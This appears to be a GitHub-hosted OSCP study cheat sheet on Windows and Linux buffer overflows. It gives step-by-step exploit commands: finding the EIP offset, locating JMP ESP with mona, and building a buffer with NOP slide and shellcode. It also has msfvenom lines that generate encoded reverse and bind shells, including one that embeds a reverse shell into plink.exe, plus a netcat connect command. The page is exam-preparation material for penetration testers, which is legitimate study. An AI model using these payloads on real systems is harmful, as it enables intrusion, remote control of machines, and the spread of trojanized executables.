forked from sd-geek/OSCP
-
Notifications
You must be signed in to change notification settings - Fork 14
/
Copy path08 - Buffer Overflow
70 lines (50 loc) · 2.86 KB
/
08 - Buffer Overflow
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
---------------- Buffer Overflow ----------------
/usr/share/metasploit-framework/tools/pattern_create.rb <[LENGTH]>
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -<[ADDRESS]>
DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
MSFvenom
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
---------------- Windows Buffer Overflows ----------------
Controlling EIP
locate pattern_create
# pattern_create.rb -l 2700
locate pattern_offset
# pattern_offset.rb -q 39694438
Verify exact location of EIP - [*] Exact match at offset 2606
# buffer = "A" * 2606 + "B" * 4 + "C" * 90
Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
Use Mona to determine a module that is unprotected
Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP
Otherwise without DEP, we can stick our
Use NASM to determine the HEX code for a JMP ESP instruction
# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb JMP ESP 00000000 FFE4 jmp esp
Run Mona in immunity log window to find (FFE4) XEF command
# !mona find -s "\xff\xe4" -m slmfc.dll found at 0x5f4a358f - Flip around for little endian format
# buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
MSFVenom to create payload
# msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Final Payload with NOP slide
# buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
Create a PE Reverse Shell
# msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe
Create a PE Reverse Shell and Encode 9 times with Shikata_ga_nai
# msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
Create a PE reverse shell and embed it into an existing executable
# msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
Create a PE Reverse HTTPS shell
# msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe
---------------- Linux Buffer Overflows ----------------
Run Evans Debugger against an app
# edb --run /usr/games/crossfire/bin/crossfire
ESP register points toward the end of our CBuffer
add eax,12
jmp eax
83C00C add eax,byte +0xc
FFE0 jmp eax
Check for “Bad Characters” Process of elimination - Run multiple times 0x00 - 0xFF
Find JMP ESP address
"\x97\x45\x13\x08" # Found at Address 08134597
crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" –e x86/shikata_ga_nai
Connect to the shell with netcat:
# nc -v $ip 4444